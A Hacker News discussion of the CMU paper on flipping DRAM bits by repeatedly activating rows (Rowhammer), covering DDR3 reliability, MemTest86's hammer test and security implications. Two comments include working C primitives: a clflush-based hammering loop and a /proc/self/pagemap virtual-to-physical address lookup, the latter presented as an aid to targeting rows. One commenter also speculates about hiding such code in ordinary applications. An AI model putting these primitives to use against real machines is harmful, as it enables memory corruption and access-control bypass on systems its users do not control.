
Flipping Bits in Memory Without Accessing Them [pdf] - lelf
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
======
userbinator
The tl;dr of this is: DDR3 DRAM modules are not as reliable as once thought,
and all the ones from 2012 and 2013 that they tested showed errors when
exercised with the right access patterns.
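
For reference, the "right access pattern" boils down to repeatedly reading two
addresses that map to different rows of the same DRAM bank, flushing them from
the cache each time so every read actually reaches DRAM. The paper gives it as
a short x86 asm loop; a rough C sketch of the same idea (assuming the caller
has already picked x and y so they share a bank):

    #include <emmintrin.h>   /* _mm_clflush, _mm_mfence */
    #include <stdint.h>

    /* Activate the two rows over and over within one refresh interval.
       The clflush is what defeats the cache; without it the reads would
       never reach DRAM after the first iteration. */
    void hammer(volatile uint64_t *x, volatile uint64_t *y, long n)
    {
        for (long i = 0; i < n; i++) {
            (void)*x;                      /* activate row containing x */
            (void)*y;                      /* activate row containing y */
            _mm_clflush((const void *)x);  /* flush so the next read hits DRAM */
            _mm_clflush((const void *)y);
            _mm_mfence();
        }
    }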

What isn't mentioned is whether these would be the types of errors that the
usual memory testers like MemTest86 could detect --- but based on the lack of
any significant news stories in the past 2 years, I'd guess not. Perhaps this
could explain why a lot of people who encountered weird hardware-ish problems
could run MemTest with no errors but still crash with the right workload.

Their dismissal of one of the "potential solutions" is a bit of a WTF:

 _Manufacturers could fix the problem at the chip-level by improving circuit
design. However, the problem could resurface when the process technology is
upgraded. In addition, this may get worse in the future as cells become
smaller and more vulnerable._

As their tests show, modules from 2008 and '09 are basically perfect, and most
of the ones from '10 too. Why could this change in process even be called an
"upgrade" if it results in memory that no longer behaves like memory should? To
me, it's clearly a serious flaw. Their "workaround" proposal of adding more
complexity to the memory controller, which doesn't actually guarantee a
solution, just feels... _wrong_.

I think this is all really quite scary - programmers are used to, and all
software depends on, memory as something whose contents should not ever change
without being written to! While the majority of access patterns won't trigger
this flaw, the ones that do could have significant cascading effects. This
paper really should get more exposure to the public.

~~~
nkurz
Nice review. This is a good paper, and I found it worth reading just for the
clear explanation of how DDR3 memory actually works. Maybe one of these times
I'll finally learn it well enough to remember which is a rank and which is a
bank.

 _Why could this change in process even be called an "upgrade" if it results
in memory that doesn't behave anymore like memory should?_

I wasn't sure from the paper, but I think they were testing memory of
different scale (nm). At least, the majority of the chips with no errors were
1 GB, and the majority of the chips with errors were 2 GB. It's an improvement
because the smaller scale allows higher densities and more storage per chip.

More explanation about the "row hammer" issue is here:

[http://forums.xilinx.com/t5/Xcell-Daily-Blog/Unexplained-mem...](http://forums.xilinx.com/t5/Xcell-Daily-Blog/Unexplained-memory-errors-in-your-DDR3-design-Maybe-it-s-Row/ba-p/497600)

 _the usual memory testers like MemTest86 could detect_

Historically no, but MemTest86 6.0, released a couple of months ago, added a
"Hammer Test" citing this paper.

 _I think this is all really quite scary - programmers are used to, and all
software depends on, memory as something whose contents should not ever change
without being written to!_

I agree. From the paper, the strong implication is that a user running
unprivileged code on any modern computer can corrupt memory outside of their
process. Perhaps even with asm.js? Comments in the release announcement thread
suggest, though, that although the problem is real, the paper is a bit
alarmist about the prevalence:
[http://www.passmark.com/forum/showthread.php?4836-MemTest86-...](http://www.passmark.com/forum/showthread.php?4836-MemTest86-v6-0-Beta)

~~~
userbinator
 _It's an improvement because the smaller scale allows higher densities and
more storage per chip._

Yes, that's the usual explanation, but I don't think it makes much sense here
since the ostensibly "better" memory can produce visible errors that the older
generation didn't. I see the word "tradeoff" used often in situations like
this, but I don't agree that this is one, since at some point on the
reliability scale it just stops being memory completely and devolves into some
weird approximation of it.

 _From the paper, the strong implication is that a user running unprivileged
code on any modern computer can corrupt memory outside of their process_

Indeed, that's the big message I get: a tiny and innocuous-looking piece of
code can easily corrupt memory. I'm not someone who believes in conspiracy
theories much, but this looks like an amazingly good backdoor or constituent
of one to me. If memory controllers implement workarounds such as the one
described in the paper to reduce these types of errors, they will also
naturally have options to turn them off for testing/debugging purposes, etc.
The great majority of the time, nothing unusual will be noticeable if they are
turned off, but the system then becomes vulnerable to the specific access
patterns that trigger the fault. Since the documentation on the latest memory
controllers is largely kept secret, a firmware update that silently changes
this setting wouldn't raise much concern - memory initialisation code usually
uses lots of undocumented registers and values anyway. Then all it takes is a
tiny piece of user-level code (possibly obfuscated/concealed in some other
mundane application), maybe with some cooperation/knowledge of how the OS's VM
mapping works, to enable relatively precise corruption of certain addresses in
memory. Although largely (publicly) undocumented, it wouldn't be so difficult
to reverse-engineer the row<>address mappings either. The results could range
from DoS to bypassing access controls, depending on what gets targeted.
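
For what it's worth, one ingredient for that kind of precision is knowing which
physical frames your virtual pages sit in. On Linux that has traditionally been
readable by unprivileged code from /proc/self/pagemap (newer kernels restrict
the PFN field); a rough sketch, from which a reverse-engineered
channel/rank/bank/row mapping could then pick rows to hammer:

    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>

    /* Each pagemap entry is 64 bits: bit 63 = page present,
       bits 0-54 = physical frame number. */
    uint64_t virt_to_phys(void *vaddr)
    {
        long pagesize = sysconf(_SC_PAGESIZE);
        uint64_t entry = 0;
        int fd = open("/proc/self/pagemap", O_RDONLY);
        if (fd < 0) return 0;

        off_t offset = ((uintptr_t)vaddr / pagesize) * sizeof(entry);
        if (pread(fd, &entry, sizeof(entry), offset) != (ssize_t)sizeof(entry) ||
            !(entry & (1ULL << 63))) {                /* page not mapped */
            close(fd);
            return 0;
        }
        close(fd);

        uint64_t pfn = entry & ((1ULL << 55) - 1);
        return pfn * pagesize + ((uintptr_t)vaddr % pagesize);
    }

    int main(void)
    {
        int x = 42;
        printf("physical address of &x: 0x%llx\n",
               (unsigned long long)virt_to_phys(&x));
        return 0;
    }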

The subtle nature of this approach is what makes it all the scarier; the
access patterns that trigger it aren't so unusual, and it's just reading from
memory. I doubt it can be easily triggered (never say never...) from languages
like JS, but virtualised environments appear vulnerable (unless the
hypervisor constantly moves the pages around, incurring a significant
performance penalty).

 _although the problem is real, the paper is a bit alarmist about the
prevalence_

The paper assumes exact knowledge of the row<>address mappings and hammers
the DRAM with that, whereas MemTest's implementation might not know the exact
mapping used by a particular controller+configuration. Their estimate is 5-20%
(a huge range), under "less optimal" hammering, which is still cause for
concern.

